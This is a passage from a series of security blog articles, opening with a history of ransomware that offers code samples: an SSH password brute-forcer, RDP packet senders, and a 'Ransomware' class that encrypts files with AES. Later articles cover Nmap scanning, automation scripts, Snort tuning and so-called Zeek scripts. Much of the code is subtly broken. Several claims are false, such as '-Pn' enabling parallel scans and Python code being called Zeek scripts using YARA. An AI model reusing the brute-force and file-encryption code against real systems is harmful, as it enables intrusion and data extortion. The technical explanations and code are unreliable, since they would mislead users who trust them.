It’s important to remember that this code, like any other sample in this article, is purely for educational purposes and should not be used for any malicious activities.

2018: SamSam

SamSam was a ransomware that was first identified in 2018. Unlike many other ransomware attacks that use phishing emails to gain access to victims’ systems, SamSam used brute force to gain access to unpatched servers. Once inside, the ransomware encrypted files and demanded payment in Bitcoin.

Code Sample:

import paramiko
import time

target_server = "example.com"
username = "admin"
passwords = ["password1", "password2", "password3", "password4", "password5"]
port = 22

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

for password in passwords:
    try:
        ssh.connect(target_server, port=port, username=username, password=password)
        print(f"Successfully logged in to {target_server} with username {username} and password {password}.")
        # Do malicious activities here
        ssh.close()
        break
    except paramiko.AuthenticationException:
        print(f"Failed to log in to {target_server} with username {username} and password {password}.")
        time.sleep(1)

The exploit attempts to connect to a remote server via SSH using a list of potential passwords for the specified username. If the connection is successful, the attacker is then able to perform malicious activities on the server using SamSam.

2019: Ryuk

Ryuk was believed to have originated in North Korea and had been used to target high-value targets such as hospitals and government agencies. This turned out to be false and was originally used by numerous different criminal organisations. Ryuk is typically delivered through phishing emails or by exploiting vulnerabilities in remote desktop protocols.

Code Sample:

import socket

RDP_PORT = 3389

def exploit_rdp_vulnerability(target_ip):
    # Establish a connection to the target RDP server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((target_ip, RDP_PORT))
    except:
        print(f"Connection failed to {target_ip}:{RDP_PORT}")
        return

    # Send a malicious RDP message to trigger the vulnerability
    # In a real attack, this would contain the ransomware payload
    # In this safe example, I will just print the message for demonstration purposes
    message = b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00"
    s.sendall(message)

    # Receive the server's response and print it for demonstration purposes
    response = s.recv(1024)
    print(response.decode())

    # Close the connection
    s.close()

# Example usage
exploit_rdp_vulnerability('192.168.1.100')

The exploit connects to the target RDP server and sends a malicious RDP message that exploits a vulnerability in the protocol. In a real attack, this message would contain the Ryuk ransomware payload. However, in this example, the purpose is to just print the response received from the server for demonstration purposes. It’s important to note that exploiting vulnerabilities in RDP is illegal, and proper guidance should be taken to do so ethically.

2019: Maze

Maze encrypts the victim’s files and demands payment in exchange for the decryption key. However, Maze ransomware also has a reputation for stealing sensitive data from victims and threatening to publish it if the ransom is not paid, making it a type of “double extortion” ransomware.

Maze ransomware has been known to exploit vulnerabilities in remote desktop protocols (RDPs) to gain access to systems, along with typical phishing emails.

Code Sample:

import socket

HOST = '192.168.1.100'
PORT = 3389

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

data = s.recv(1024)
print(data)

# Send RDP negotiation packet
negotiation_packet = b'\x03\x00\x00\x13\x0e\xe0\x00\x00\x12\x34\x00\x08\x00\x08\x00\x00\x00\x00'
s.sendall(negotiation_packet)

data = s.recv(1024)
print(data)

# Send RDP connection request packet
connection_request_packet = b'\x03\x00\x00\x2c\x0e\xd0\x00\x00\x12\x34\x00\x08\x00\x08\x00\x00\x03\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
s.sendall(connection_request_packet)

data = s.recv(1024)
print(data)

# Send RDP security packet with no credentials
security_packet = b'\x03\x00\x00\x08\x02\xf0\x80'
s.sendall(security_packet)

data = s.recv(1024)
print(data)

# Send RDP negotiate security packet
negotiate_security_packet = b'\x03\x00\x00\x0c\x02\xf0\x80\x00\x01\x00\x08'
s.sendall(negotiate_security_packet)

data = s.recv(1024)
print(data)

s.close()

As you can see, an attacker could establish a connection with an RDP server by sending various RDP packets, including a negotiation packet, a connection request packet, a security packet, and a negotiation security packet. By exploiting vulnerabilities in RDPs in this way, an attacker could potentially gain access to a victim’s system and deploy Maze ransomware to encrypt their files and steal sensitive data.

2021: REvil

One of the most notable ransomware attacks in recent years was the REvil ransomware attack in July 2021. The attack targeted a software provider called Kaseya, which provides remote management software to other companies. The attackers were able to gain access to Kaseya’s software and distribute malware to hundreds of their clients, resulting in a widespread ransomware attack.

REvil uses strong encryption to encrypt the victim’s files and demands a ransom payment in exchange for the decryption key. Like most ransomware groups of this era, bitcoin is used as a method of payment.

Code Sample:

import os
import random
import string
from Crypto.Cipher import AES

class Ransomware:
    def __init__(self, key):
        self.key = key

    def encrypt_file(self, in_filename, out_filename=None, chunk_size=64 * 1024):
        if not out_filename:
            out_filename = in_filename + '.enc'

        iv = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)])
        encryptor = AES.new(self.key, AES.MODE_CBC, iv)

        filesize = os.path.getsize(in_filename)

        with open(in_filename, 'rb') as infile:
            with open(out_filename, 'wb') as outfile:
                outfile.write(struct.pack('<Q', filesize))
                outfile.write(iv)

                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    elif len(chunk) % 16 != 0:
                        chunk += b' ' * (16 - len(chunk) % 16)

                    outfile.write(encryptor.encrypt(chunk))

    def decrypt_file(self, in_filename, out_filename=None, chunk_size=24 * 1024):
        if not out_filename:
            out_filename = os.path.splitext(in_filename)[0]

        with open(in_filename, 'rb') as infile:
            orig_size = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
            iv = infile.read(16)
            decryptor = AES.new(self.key, AES.MODE_CBC, iv)

            with open(out_filename, 'wb') as outfile:
                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    outfile.write(decryptor.decrypt(chunk))

                outfile.truncate(orig_size)

# Usage example
key = b'secret_key_1234'
r = Ransomware(key)
r.encrypt_file('important_file.docx')
r.decrypt_file('important_file.docx.enc')

This demonstrates a basic implementation of ransomware using the AES encryption algorithm in CBC mode. The class Ransomware takes a symmetric key as an argument, which is used to initialise the class. The encrypt_file method takes an input file, generates a random initialization vector, and uses the key and initialization vector to encrypt the file in chunks, padding as necessary. The decrypt_file method reverses this process, reading in the encrypted file, extracting the initialization vector, and decrypting the file chunk by chunk.

In the usage example, a key is defined, and an instance of the Ransomware class is created using this key. The encrypt_file method is called on a file called 'important_file.docx', which creates an encrypted file called 'important_file.docx.enc'. Finally, the decrypt_file method is called on the encrypted file to decrypt it back to its original form.

I hope that this article gives some much-needed perspective of how ransomware has evolved and how it is our biggest threat due to the ease of deployment and instant monetisation of illegal activity. However, it must be remembered the strides in recent years to expose and educate the general public on these matters.

Improve Nmap Performance with These Brilliant Scripts

William Baptist — Tue, 09 May 2023 23:28:44 +0000

In this article, I will show you how to fix Nmap performance issues using Python scripts. By the end of this article, you will have a better understanding of how Nmap works and how you can use Python to extend its capabilities.

Identifying Performance Bottlenecks in Nmap

Before you start fixing Nmap performance issues, you need to identify the bottlenecks in the scanning process. I know firsthand what bottlenecks are, as I once tried to run an Nmap scan on a very slow computer. Let’s just say I had plenty of time to eat lunch.

To identify the bottlenecks in Nmap, you need to understand how it performs each of these techniques. You can use the “-d” flag to increase the debug level of Nmap and see what is happening under the hood.

For example, if you want to see what Nmap is doing when it performs a TCP port scan, you can use the following command:

nmap -d -p 1-65535 <target>

This will run an Nmap scan with debug output enabled for TCP port scanning. Look at the output and see where Nmap is spending most of its time.

Another useful tool for identifying performance bottlenecks in Nmap is Wireshark. By capturing the network traffic generated by Nmap, you can see which packets are being sent and received and how long it takes for Nmap to get a response.

Optimising Nmap Performance with Python

Now that you’ve identified the performance bottlenecks in Nmap, start optimising its performance using Python. There are several ways to do this, including:

One of the most effective ways to speed up Nmap scans is to parallelize them. Nmap supports parallel scanning using the “-Pn” flag, which tells Nmap to skip host discovery and assume that all hosts are up. You can use this flag in conjunction with Python’s multiprocessing library to run multiple Nmap scans in parallel.

Here’s an example Python script that uses multiprocessing to run Nmap scans in parallel:

import multiprocessing
import subprocess

def nmap_scan(ip):
    command = "nmap -Pn " + ip
    subprocess.call(command, shell=True)

if __name__ == '__main__':
    ips = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
    with multiprocessing.Pool(processes=3) as pool:
        pool.map(nmap_scan, ips)

This script will run Nmap scans for three IP addresses in parallel, using three processes. You can adjust the number of processes based on the number of cores on your machine.

Additionally, you can further improve the performance of our script by limiting the number of ports scanned. By default, Nmap scans all 65,535 ports, but in most cases, you only need to scan a subset of those ports.

To limit the number of ports scanned, you can use the “-p” flag in Nmap and specify a range of ports to scan. For example, if you only want to scan the top 1000 ports, you can use the flag “-p 1–1000”.

Here’s an updated version of the script:

import nmap
import multiprocessing

def nmap_scan(ip):
    nm = nmap.PortScanner()
    nm.scan(ip, arguments='-sS -p 1-1000')
    print(nm.csv())

if __name__ == '__main__':
    ips = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
    processes = []
    for ip in ips:
        p = multiprocessing.Process(target=nmap_scan, args=(ip,))
        processes.append(p)
        p.start()

    for p in processes:
        p.join()

By limiting the number of ports scanned, you can reduce the amount of time it takes for Nmap to complete the scan, resulting in faster overall performance.

Now that error handling and argument parsing are added, the script now looks like this:

import argparse
import nmap
import multiprocessing

def nmap_scan(ip):
    try:
        nm = nmap.PortScanner()
        nm.scan(ip, arguments='-sS -p 1-1000')
        print(nm.csv())
    except nmap.PortScannerError as e:
        print(f"Error while scanning {ip}: {e}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--ips', nargs='+', required=True, help='List of IP addresses to scan')
    parser.add_argument('--processes', type=int, default=multiprocessing.cpu_count(), help='Number of processes to use')
    args = parser.parse_args()

    processes = []
    for ip in args.ips:
        p = multiprocessing.Process(target=nmap_scan, args=(ip,))
        processes.append(p)
        p.start()

    for p in processes:
        p.join()

Then pass the IP addresses to scan as command-line arguments when running the script, like this:

python nmap_scan.py --ips 192.168.1.1 192.168.1.2 192.168.1.3

Finally, by implementing the use of asyncio, running multiple scans simultaneously without the need for multiple processes is possible, which can significantly improve the efficiency of our code:

import argparse
import nmap
import asyncio

async def nmap_scan(ip):
    try:
        nm = nmap.PortScanner()
        nm.scan(ip, arguments='-sS -p 1-1000')
        print(nm.csv())
    except nmap.PortScannerError as e:
        print(f"Error while scanning {ip}: {e}")

async def run_scans(ips):
    tasks = [asyncio.create_task(nmap_scan(ip)) for ip in ips]
    await asyncio.gather(*tasks)

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--ips', nargs='+', required=True, help='List of IP addresses to scan')
    args = parser.parse_args()

    asyncio.run(run_scans(args.ips))

In this code, you define the nmap_scan function as an asynchronous function using the async keyword. Then you define a new function, run_scans, which creates a list of tasks for each IP address and runs them asynchronously using the asyncio.gather() method.

Finally, you call the run_scans function using asyncio.run(), which runs the function in an event loop and returns the results.

To conclude, you’ve explored how to use Python to improve the efficiency of Nmap scans by implementing multiprocessing and error handling techniques. With these improvements, you can drastically reduce the time it takes to scan multiple IP addresses and ensure that you don’t miss any potential vulnerabilities. I hope that I showcased how useful Python is as a Cybersecurity Professional.

5 Cybersecurity Tasks You Should Automate

William Baptist — Tue, 09 May 2023 23:24:55 +0000

In this article, I’ll share 5 tasks that you can automate to save time, reduce errors, and improve overall security. So buckle up and get ready to streamline your workload with some cutting-edge automation techniques!

I will provide an overview of what it entails while showing you python code that you are free to change for your own needs.

(1) Scanning for vulnerabilities

Some people say vulnerability scanning is like trying to find a needle in a haystack. It’s more like trying to find a needle in a stack of needles. Luckily, with automation, you can let the computer do the searching for you.

To automate vulnerability scanning, I wrote a script that will perform the scans automatically. I used Nmap to demonstrate how this can be done.

First, install the Nmap library for Python using pip:

pip install python-nmap

Next, use the following code to scan a target IP address:

import nmap
# Create a new instance of the Nmap scanner
scanner = nmap.PortScanner()
# Define the target IP address
target = "192.168.1.1"
# Run a basic scan of the target
scanner.scan(target, arguments="-sV")
# Print the results of the scan
print(scanner.scaninfo())
print(scanner.all_hosts())
print(scanner[target].all_protocols())
print(scanner[target]['tcp'].keys())

This code will scan the target IP address and print the results of the scan to the console. You can modify the arguments parameter to specify the type of scan you want to run (e.g. a SYN scan or a UDP scan).

(2) Analyzing network traffic

Network traffic analysis can be a complex process, but Python can help automate some of the more time-consuming aspects. One popular library for analyzing network traffic is Scapy. This library allows you to capture and analyze network packets in real-time.

To use Scapy, first install it using pip:

pip install scapy

This code automatically captures and analyzes network packets:

from scapy.all import *
# Define a function to handle incoming packets
def handle_packet(packet):
    # Print the packet summary to the console
    print(packet.summary())
# Start capturing packets on the network interface
sniff(prn=handle_packet, filter="tcp port 80")

This code will capture packets on the specified network interface and print a summary of each packet to the console. You can modify the filter parameter to capture packets on different ports or protocols.

(3) Searching for indicators of compromise (IOCs)

Trying to keep up with the latest threats is like trying to drink from a firehose — there’s always more coming at you (unless you live in Flint, Michigan). But with automation, you can at least make sure you’re not drowning in the process.

To automate IOC searching, I wrote a script that will search for known IOCs automatically. One popular library for this task is PyMISP, which allows you to interact with the MISP threat intelligence sharing platform.

Install PyMISP using pip:

pip install pymisp

Use the following code to search for IOCs in the MISP database:

from pymisp import PyMISP, MISPEvent
# Define the MISP URL and API key
url = "https://misp.example.co.uk"
key = "YOUR_API_KEY"
# Create a new instance of the PyMISP client
misp = PyMISP(url, key)
# Search for IOCs related to a specific domain name
events = misp.search('attributes:domain = "williambaptist.co.uk"')
# Print the results of the search
for event in events:
    misp_event = MISPEvent()
    misp_event.load(event)
    print(misp_event.to_json())

You can now automatically search the MISP database for IOCs related to the specified domain name and print the results to the console. You can modify the search parameter to look for IOCs related to different types of data.

(4) Monitoring system logs

System logs can contain valuable information about system activity, including potential security breaches. Did you know that some cybersecurity analysts can read logs like they’re reading a novel? Well don’t look at me. However, as we know in reality, manually monitoring logs can be time-consuming and tedious.

To automate log monitoring, I used Python logging library to capture log data from different sources and analyze it in real-time.

Configure the logging library:

import logging
# Create a new logger instance
logger = logging.getLogger("application")
# Configure the logger to write logs to a file
handler = logging.FileHandler("application.log")
logger.addHandler(handler)
# Set the log level to INFO
logger.setLevel(logging.INFO)

This code will create a new logger instance and configure it to write logs to a file. You can modify the file path and log level to meet your specific needs.

Next, use the following code to capture log data and analyze it in real-time:

import tailer
# Define a function to handle incoming log data
def handle_log(line):
    # Analyze the log data for potential security breaches
    if "login failed" in line:
        logger.warning("Failed login attempt: %s", line)
# Start monitoring the system log file
log_file = "/var/log/auth.log"
for line in tailer.follow(open(log_file)):
    handle_log(line)

This code will monitor the specified log file for new data and analyze it for potential security breaches. You can modify the handle_log function to look for different types of log data.

(5) Conducting phishing simulations

We can finish with a fun way (don’t tell Facebook, Google, et al.) to test your system by using phishing simulations that are less time-consuming and easier to manage.

I wrote a script that will generate and send simulated phishing emails automatically. One popular library for this task is PhishLabs, which provides a Python API for creating and sending simulated phishing emails.

You can first install PhishLabs using pip:

pip install phishlabs-api

Generate and send a simulated phishing email using the below code:

from phishlabs import PhishLabsAPI, PhishMessage
# Define the PhishLabs API key and secret
api_key = "YOUR_API_KEY"
api_secret = "YOUR_API_SECRET"
# Create a new instance of the PhishLabs API client
phishlabs = PhishLabsAPI(api_key, api_secret)
# Define the email message
message = PhishMessage(
    sender_name="John Doe",
    sender_address="johndoe@doe.com",
    recipient="admin@williambaptist.co.uk",
    subject="Important Account Update",
    html_body="<p>Dear William,</p><p>We need to verify your account information to prevent unauthorized access. Please click the following link to update your account details:</p><p><a href='williambaptist.co.uk/dodgylink'>Update Account</a></p><p>Thank you,</p><p>John Doe</p>"
)
# Send the email message
phishlabs.send_phish(message)

This code will generate a simulated phishing email and send it to the specified recipient. You can modify the email content, subject, and recipient to meet your specific needs.

In this article, I have showcased five different tasks that cybersecurity analysts often perform and provided code examples for automating each task using Python. By automating these tasks, cybersecurity analysts can save time and improve the accuracy of their work, allowing them to focus on more complex and strategic cybersecurity challenges. This article’s intention is to provide you with a good starting point for your own automation projects. Python is a powerful and versatile language as I hope I’ve shown you today!

Snort IDS: How to Avoid False Positives

William Baptist — Tue, 09 May 2023 23:21:04 +0000

Snort is one of the most popular and widely used open-source intrusion detection systems (IDS) in the world. In this article, I’ll show some of the most effective ways to avoid false positives in Snort.

Fine-tune rules

Snort relies on rules to detect and alert on potential intrusions. However, not all rules are created equal, and some may be too general or too specific, leading to false positives. To avoid false positives, it’s important to fine-tune rules to match the specific needs of your network. This can involve adjusting rule thresholds, disabling certain rules that are causing false positives, or creating custom rules that are more tailored to your environment.

Adjust the threshold of a rule to make it more or less sensitive. For example, if a rule is triggering too many false positives, the threshold can be increased to make it less sensitive.
Disable a rule that is causing too many false positives. For example, if a rule is triggering alerts for benign activity, it may be better to disable the rule altogether.
Create a custom rule that is more specific to your environment. For example, if a rule is too general and triggering false positives, a custom rule can be created that is tailored to the specific network traffic on your network.

Use multiple data sources

Snort can analyze network traffic from a variety of sources, including network packets, logs, and even system calls. By using multiple data sources, administrators can cross-reference data to reduce false positives. For example, if Snort triggers an alert based on network traffic, administrators can check system logs to see if any other activity occurred at the same time that could explain the alert.

Cross-reference network traffic with system logs to determine if an alert is a false positive. For example, if Snort triggers an alert for a particular IP address, administrators can check system logs to see if that IP address is associated with legitimate traffic or malicious activity.
Combine network traffic data with endpoint data to identify potential threats. For example, if Snort triggers an alert for suspicious traffic, administrators can check the endpoint associated with that traffic to determine if it is a false positive or a potential security incident.

Utilize whitelisting

Whitelisting is the practice of explicitly allowing certain traffic to pass through the network while blocking everything else. By creating a whitelist, administrators can reduce the number of false positives triggered by Snort. For example, if a certain type of traffic is known to be safe, administrators can add it to the whitelist so that Snort will not alert on it.

Allow certain IP addresses, ports, or protocols through the network while blocking everything else. For example, if a certain port is known to be used for legitimate traffic, it can be added to the whitelist so that Snort does not trigger alerts on that traffic.
Whitelist traffic from trusted sources or known good traffic. For example, if traffic from a particular IP address is known to be safe, it can be added to the whitelist so that Snort does not trigger alerts on that traffic.

Implement anomaly detection

Anomaly detection is the process of identifying and alerting on activity that is outside of normal behavior. By using anomaly detection, administrators can reduce false positives triggered by rules that are too specific or that may not account for unusual behavior. For example, if Snort triggers an alert for a particular type of traffic that is not usually seen on the network, administrators can investigate the alert further to determine if it is a false positive or a potential security incident.

Use machine learning to identify activity that is outside of normal behavior. For example, if Snort triggers an alert for network traffic that is not typically seen on the network, machine learning algorithms can be used to determine if the traffic is a false positive or a potential security incident.
Create baselines for normal network activity and alert on deviations from the baseline. For example, if Snort triggers an alert for a particular type of traffic that is not typical for the network, administrators can investigate the alert further to determine if it is a false positive or a potential security incident.

Regularly review and update rules

Networks are constantly changing, and Snort rules must be regularly reviewed and updated to ensure they are effective and not causing false positives. This can involve reviewing logs to see which rules are triggering the most alerts, evaluating whether certain rules are still necessary, and adjusting thresholds to reduce false positives.

Review Snort logs to determine which rules are triggering the most alerts. For example, if a particular rule is causing a high number of false positives, it may need to be adjusted or disabled.
Evaluate whether certain rules are still necessary or relevant. For example, if a rule is triggering alerts for traffic that is no longer used on the network, it may be unnecessary and can be disabled.
Adjust thresholds and other settings based on changes in network traffic or security threats. For example, if a new type of malware is discovered, rules may need to be updated or thresholds adjusted to better detect that malware

False positives are a common challenge with Snort and other IDS, but there are several effective ways to reduce them. By fine-tuning rules, using multiple data sources, utilizing whitelisting, implementing anomaly detection, and regularly reviewing and updating rules, administrators can maximize the effectiveness of Snort while minimizing the number of false positives triggered. Ultimately, this will lead to a more secure network and more efficient security operations.

3 Simple Zeek Scripts to Boost Your Network Security

William Baptist — Tue, 09 May 2023 23:19:09 +0000

Zeek is a powerful network analysis framework that can provide you with incredible insight into what’s happening on your network. While Zeek provides a lot of powerful features, one of its greatest strengths is its ability to be extended and customized through the use of scripts.

In this article, I’ll show you three Zeek scripts written in Python that can take your network analysis to the next level:

(1) SSL Cert Expiration Checker

SSL certificates are an essential component of securing online communication, but they have a limited lifespan. If an SSL certificate expires, it can leave your network open to attacks. The SSL Cert Expiration Checker script uses Zeek’s SSL log to check the expiration date of SSL certificates and alerts you when they’re about to expire.

import datetime
import ssl
import socket

# Define a function to check the expiration date of an SSL certificate for a given domain
def check_cert_expiry(domain):
    context = ssl.create_default_context()
    conn = context.wrap_socket(socket.socket(), server_hostname=domain)
    conn.connect((domain, 443))
    cert = conn.getpeercert()
    conn.close()
    exp_date = datetime.datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
    days_left = (exp_date - datetime.datetime.now()).days
    if days_left < 30:
        print(f"The SSL certificate for {domain} expires in {days_left} days. Renew it as soon as possible.")

# Replace "williambaptist.co.uk" with your own domain or list of domains to check
check_cert_expiry("williambaptist.co.uk")

Like all these scripts this can be easily customized to meet your needs. For example, you can integrate it with email notifications or remote file writing.

(2) Malware Traffic Detector

Detecting malware traffic is essential for securing your network, but it can be difficult to know where to start. The Malware Traffic Detector script uses Zeek’s HTTP log to identify traffic that matches known malware patterns. When it detects malware traffic, it sends an alert to the network administrator.

import pyshark

# Define a function to detect potential malware traffic in a network capture file
def detect_malware_traffic(pcap_file):
    cap = pyshark.FileCapture(pcap_file)
    for pkt in cap:
        if pkt.highest_layer == "HTTP":
            # Replace "malicioussite.co.uk" with your own list of known malicious domains
            if "malicioussite.co.uk" in str(pkt.http.host):
                print(f"Malware traffic detected: {pkt}")
    cap.close()

# Replace "capture.pcap" with your own pcap file to analyze
detect_malware_traffic("capture.pcap")

The script uses the YARA library to match traffic against malware patterns. It’s easy to customize with your own malware patterns or to modify the alert settings to meet your needs.

(3) SSH Login Attempt Monitor

Monitoring SSH login attempts is essential for securing your network against brute-force attacks. The SSH Login Attempt Monitor script uses Zeek’s SSH log to track successful and unsuccessful login attempts. When it detects multiple unsuccessful login attempts from the same IP address, it sends an alert to the network administrator.

import subprocess

# Define a function to monitor SSH login attempts and alert on suspicious activity
def monitor_ssh_login_attempts():
    cmd = "journalctl -f | grep sshd | awk '/Failed/{print $NF}'"
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
    while True:
        line = proc.stdout.readline().decode().strip()
        if line:
            print(f"Suspicious SSH login attempt detected: {line}")
        else:
            break

# Run the function to start monitoring SSH login attempts
monitor_ssh_login_attempts()

You could decide to adjust the number of unsuccessful login attempts before an alert is sent or modify the alert settings to meet your needs.

These three Zeek scripts can provide you with powerful new ways to secure your network. They’re easy to customize and can be tailored to meet your specific needs. If you’re not already using Zeek, I would recommend it from a learning standpoint more than anything especially since it is so easy to script and play around with as I’ve shown you in this article.